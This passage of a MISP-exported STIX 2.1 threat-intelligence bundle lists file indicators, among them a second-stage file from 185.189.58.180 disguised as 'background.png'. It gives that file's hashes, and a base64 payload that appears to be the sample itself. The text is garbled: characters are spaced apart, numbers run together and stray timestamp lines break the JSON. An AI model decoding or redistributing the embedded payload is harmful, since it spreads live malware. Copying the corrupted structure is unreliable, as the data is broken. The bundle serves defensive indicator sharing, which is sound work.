j G 3 b 0 s x C j w n O 6 o Q a S B l b R L M + m s k k H q j k 4 I u G T 3 / g T w T s p 4 H B 4 L + J G J O Q O / T c n t 4 X n o y H N s U q i d q w v V a Y 2 Q D G d w j 0 v v u r N 4e4 Z X v J 8 T g P 7 Z s O t s I H T h P 0 v X 4 T e p W 95 z I 2 / q N q h u Q q T p S 2 j i 4e6 o 6 d A O k y J m n T 0 u 1 h R j 7 r I G U M / w u q E e k F d e H p X 5 e w b B a Z z i R l F v r 5 v 3 j X Q L R Z 87 O o 143 D 59 d s C T z q L a R e K 98 Q K + W A L T J 0 k E 7 S X V j J + J D N D 3 g Y A F B 3 K S O G s T i 7 z Z O s z x h f L k u p X 4 x X t l a 0 d j y z r B + n m K 7 r T N 6 G 1 Y e e V H y u 8 y O I r 3 r D E U m K 43 t 704 X / g I I 3 T 4 s V t 3 K d 21 W u p f w M C v 32 m A h Q 5 N y c b V o b 6 J s Z O 0 b c V i a k 9 w w A / w J i J v l M V 3 X f C q x x 3 i O p B y V 88 T K D n k n K g S w P J p E L n p A F w b W y w f 8 G v I s o S 3 P t Z f 4 F 9 i 1 d o x 63 o y m 6 e k U c / 5 U p g 0 a I h g n R z q a A 93 X 3 o e + F X 6 S O o 3 / d u 3 T d I N 4 + B g N c n t f W O 1 k W N I U x k c V N t T d 6 a t m c D / S 0 H Y 9 c u C N 1 h y 0 O r s 1 M s M 4 W s b C Y + 4 O 4 D k M S X e T m L r A 1 v h 0 76 s O E p r M N g R B t W / t K 9 M v N V b 8 t n 24 + F j + w H d Y 41 / 9 l I l q N B 0 F u n x a H 4 W m S 8 n a J d 2 n 7 U l T t s H k L P 4 g 5 s Q M e j S 5 A s t 0 n K 6 c E H 5 L a 7 r B 9 W v N U n 0 E M I + 8 D M Z B 0 W Y 6 x N t 28 a j H / I C f 0 N + 135 g n 3 u + p C o s L t R Z a x d V 7 C u K R k n h T H V k Z J 2 p J d K Y L t J H e p S 5 B 2 P j E Q b c M U s v N B 8396 i R 9 T N w y / 0 F K 1 / I q u + 0 5 G K v R d N T D 7 Y Q T S 0 w X p l R / C h v I K v o J Q E z g L p z j N R g 2 X m u k N h l n T L 3 U k X 8 C 3 h K e B 5 p u f / l 6 T 9 R W i X k R H s W W n i p I 7 Y L w A T q 5 y 4 a u q / 7 r / d T y K n 8 a l U i e n D t / X Y N l b b R T a 1 k f u p 0 Y S s 40 t t 9 A S d v u 5 D V a 6 y S 2 J 3 k n 1 x g x e E E Z h / g H v n p 8 L y 6 S 4 w 9 + h b T Z s I I U x y H S / r Z s s i R g X L x M d b L B j s b Q 0 j X D X e e z 8 t I E g 2 + d z K J 86 N A R U P Q h F / U e p s J n P W r 1 C N 89 q w Q f b v l o f P P G Q O Z F C w p J / Z z 7 I F + g S Y X E u Q K e f z X p e 7 b 0 N 3 N 2 p q 67 N G L w P E q m o 2 q j H l e Q L g Z u T u P N S z 7 P 63 c + 21 J F Z J 7 j t y H a p F i J S R n X 3 r X i 1 B C t n G L n Y u i Y f J B q y K S r j y P z c L F W a 3 Z 0 v C J Q 5 i c c z Z C r F d l o O Z t C i T x N d N f F k V l 0 w N 809 g 5 j N o u Q L x P 8 r 15 s o M / n D L 4 H D O L e F 1 G + N S q e I s q X f b m / q 4 I B C k g W u T R 57 l Z R + Q M 2 V o g / I x D h d 7 f k f S 3 A s 9 + I M L 2 m B D c D G R C t o D 675 I b Q G E N v d q Z W / M F B J k Q F 4 Q p 6 I 1 q 1 m 9 v j F h x L w F x z L h P q C B M s g f Q R F U L t z L t 6 g j 0 T D 53 U Q J f N F f e z t w o 2 G u t T y d l R G y h f + 2 N 1 M 6 w d u o x 47 p d W Y a d 1 k p 8 r 0 s u r G 7 t 45 T G H x q J K q d g E J c z e K r L u i p / 5 k C b L u y J p W o c t / h d h 3 V o I L j e d n B M R + q b 8 G n 8 N g V X k / 48 Z 9 m j c v y S T y V / Z d 5 Y / S 9 a p G J l K C e M b 5 t T I n z z D / r Z T W 3 g i w d q c R F Z Q 42 Y 2 t h / h d v S h 1 T h z 46339 J 5 T 0 H p f t e V W b G 9 c P W 86 a w u D z + j K T N D A a V P q + o 5 Q 7 I l f E M i Q M x 4 i Z d y s v Y x 1 U M r d 5 b 4 L / 48 o 4 Z F X v 0 L S q w X 6 o Q E 76 A D S H x I 9 c Z 1 P q w q 0 d n i W 8 w y B I s w r e z f B J d t t X s j 71 S D m 0 k l a + V M 0 / T a W q P z n 8 d 8 a 6 q 4 r + f P Z n s V h U B 2 I O E r D / x B T n Q h l 3 e j P 62 Z d m 0 F h + X r 9 B u w b x K l c R A 8 e x c n A X s d b 9 G s A 0 Q i 6 B d 6 t B P + I l k y p w j O n p G c N P R 0 x 2 B T s E k p O x x z g e V H x Q D Q T K 7 l + I D l x 5 r J I o c C B U x Q p a f g O 4 a i Y 3 Y u Q I D H 3 s C 0 B o m A l j a i m g w h f g i + y y D G n k e G H Q S G 0 N E 5 w G 318 O r M 3 Y 0 M 1 F o 8 R q 8 M D K u m u C g + 3 G w t Q K B c e A N o o q / B p k K 7 z s u a U G x n S j Z Q 0 D e G u M m 1 c 3 r z A k 6 z N / E 77 v N n A K / X i j I K V 6 z 7 J + 8 H N Y V K A k 9 Q O 2 n 2 b w O K 66 f Z f D H q s z G d f n V W 1 H + 8 n s a K H u j a e l d a H G V J B D c w X D X i l 3 E C c Q Z 9 s U J K 76 R A r V 76 D B n 3 K a I n d v 7 v 38 u V 6 U N Q w t / 5 t m B v p M 36 y K B v + q P s n d z m V s I 69 y N a M x 5 O q v q Y 3 m s S F 0 j V X M W E t P K f h X 3 h C N o V R Q y y P 6 e c t R 7 d s G 3 / K i 5 W a 84 q + a N / e K K a S g O c H 5 v k u Z j 26 U h O K e b T Y Z 9 E B H 20 a k X j V U K M t k k x G f y X n D G g 46 Z F N Y M + J h h M L y B m U H 2 U h 1 l 2 x l N K 0 Q i J U / 90 g a 88 O s M Q U k B l u i 1 n 0 3 q E s f i Q k N 26 c 4 q C K U G W W x 6 p S i / I B 52 X f C 7 Z I D W 9 k N X Y O m b b F W T T j U y i G t Q 0 Q 33 H p g S g Y / 0 P a X x D r G x x / v X O V 92 z 5 r J i m p l 0 V 9 I U r d 5 X V d e J q 6097 e v a c n U h E e B 2 e M f b Z N p 1 T H 4 X R P B h J o s v V b e 8 K Z l V p B j H f u I J A D r 0 P m W b V P e Q z x g e 6 I 14 W t 5 a / Z d T A N K W x B u u b F q 9 h l G Q A / f T l v A q u z e u 7 j P y q 1 s p n O B r 6 e d 5 r u 4 n
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T07:02:26Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b547-3fd4-451f-b654-4fec950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T10:21:34.000Z" ,
"modified" : "2018-05-25T10:21:34.000Z" ,
"description" : "2nd stage from 185.189.58.180" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' e 766226346 f 8 d 0 b 0 97 a c 7 c 87 e d b f 605 a ' A N D f i l e : h a s h e s . S H A 1 = ' c 1 d 3 c d 8769 a 71 d d 0e379 c 9727 e c 8443 a 29 c 963 c 5 ' A N D f i l e : h a s h e s . S H A 256 = ' 89 a e d e 2 f 30334329388 a c b 0 864 a 9 c 9e45 d 209 a f 4 b e 47 d 1818 f c 4e23 a c d b 5 c d d d ' A N D f i l e : n a m e = ' b a c k g r o u n d . p n g ' A N D f i l e : s i z e = ' 53575 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A H I 4 u U w 5 Y y f N W p s A A E f R A A A g A B w A Z T c 2 N j I y N j M 0 N m Y 4 Z D B i M D k 3 Y W M 3 Y z g 3 Z W R i Z j Y w N W F V V A k A A 0e1 B 1 t H t Q d b d X g L A A E E I Q A A A A Q h A A A A Z R G r z q G M / h n Z P n o N Y A i X M t o / E U u E S 4 s v A Z J B e l y w U Z Q l w A v h V 7 i k J k V n 5 + x C N e i 0 t K p s 9 p c 79 v c f d O m w o q M s p e l O E Q b R s x h u b T / X x P / C k 7 W 2 w 7 o A N d 6 + z v 6 m t M R n Z p v / b r a n f i N 7 P N Q + Z h 7 E I F C E a W 2 C V 0 Q U g a 3 y n D 6 K V t V E r g S B F 0 E o 323 m 2 n l l C 9 R C b X k 5 a D L X R / c 7 b j 6 G h a n s F E Y + u N z b t h 6 o s t O 7 x i b z + S W 26 e c / M V J k I 6 E w 3 i 0 G A 9 n E v 6 z i q D s B n j l Z g I w 0 P L b b k a + 4 i 2 i p 1 K M 1 R l M H f i 8 C J j U i m M a G 2 C h y X Y 17 z D / m 3 V T 1 f v B q K I W i V j F t O C W Y z J P X i 4 t R 6 H q V Z g 9 B q S a 0 T y t Y + 9 e Y 5 V Q 18 g / 5 X T h a w v 99 t 8 a P 7 A e 4E4 m u p r U Q 0 b F 4 b n 7 V U L p 7 r L w K O 7 X X J 67 Y y I v p L 0 l l o 9 G d m L t S I G K l N e + d 51 t x a 1 V 2 r U / A 6 T J O u 8 R a 4 h W O 5 f g 8 A F A M W 9 W V x 8 H i q Y C t K I r 5 I 33 s 3 I u o L T D L Z 9 l j h i Q B f x 8 j U a V r Y c e t 7 q O 4 R q 4 T D C o Q x a 4 q x + 614 / E J k 7 G N W M D P y i y y z 2 n G O a R v i x w v 4621 x w 1 P x y k W H Y a 9 E V n 48 D Y x p k 1 I 0 N f E Z K G w M x L 4 m Y a 8 h E L f 8 l D 3 T 2 O o Z a v V + B i i V m S t 7 K f p r V 0 U g K j N z A x J s N l J Y Z d L m 1 t B W r J x A V e y Y + 2 C k W v r 5 u K b s h 8 h B o L I z W + 3 O U M Q 1 H n m 8 g U V 7 w n w V P 8 R i 0 J f s Y o W 6 q i M z C c V o b G T p y 4 A c l h Y z g 4 I E A d l m 48 R t E V 0 W 6 q J E B o s 5 S y e 15 N M 70 I R d q V d n 65 Z z j 9 Y G 0 U 98e1 D T u a h A V W E Z R K 1 E a 2 h q g Y d Y Z o s 3 f d 0 t G w T J Q R r F o j y G / J 1 i b m n r q L r 0 M W z g h H v z P 4 B L y 7 k e v I 5 x 3E2 o Y o A n g r + o s u e 85 y 2 B T 2 h E e d B c e q B n 5 o n C f Q 9 A X E p I z Z m W / 0 b x B o v A p 9 n l K 4 C P Y R h P f o K 1 + 2 p z g + + Y X f l u V l V 6 w B X S L l k N q O 867 t U S n V U X h g 0 Q Z P x W 9 U F r k W z g Y T K B X K L Y + Y O G Z W z u Y 7 h k n Q Q q W e s s 6 u i V c l H D a W P u h T B b R w z W p y X P Z S A v C F I v V j Y c p D n N Y i e y + 4 O / s 4 J j y x M P S x 71 I v 4 r t A p h i t C 9 p J 13 P l b W K a x H K u r V Y W y a D u V D M + t h T f e W a I Q A H X 4 Q K u c z Y 0 K u p N f g D D 0 J + x L T 77 O P 3 Q c 5 M J p W B x q s v R C 9 L I U 4 n k + 4 U i 0 W v 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T10:21:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T10:21:31.000Z" ,
"modified" : "2018-05-25T10:21:31.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-08-07 08:13:15 +00:00
"id" : "relationship--4fbb71a5-2ba8-4049-988f-d6fdbdab8828" ,
2023-04-21 14:44:17 +00:00
"created" : "2018-05-25T10:21:32.000Z" ,
"modified" : "2018-05-25T10:21:32.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--5b07b547-3fd4-451f-b654-4fec950d210f" ,
"target_ref" : "x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}
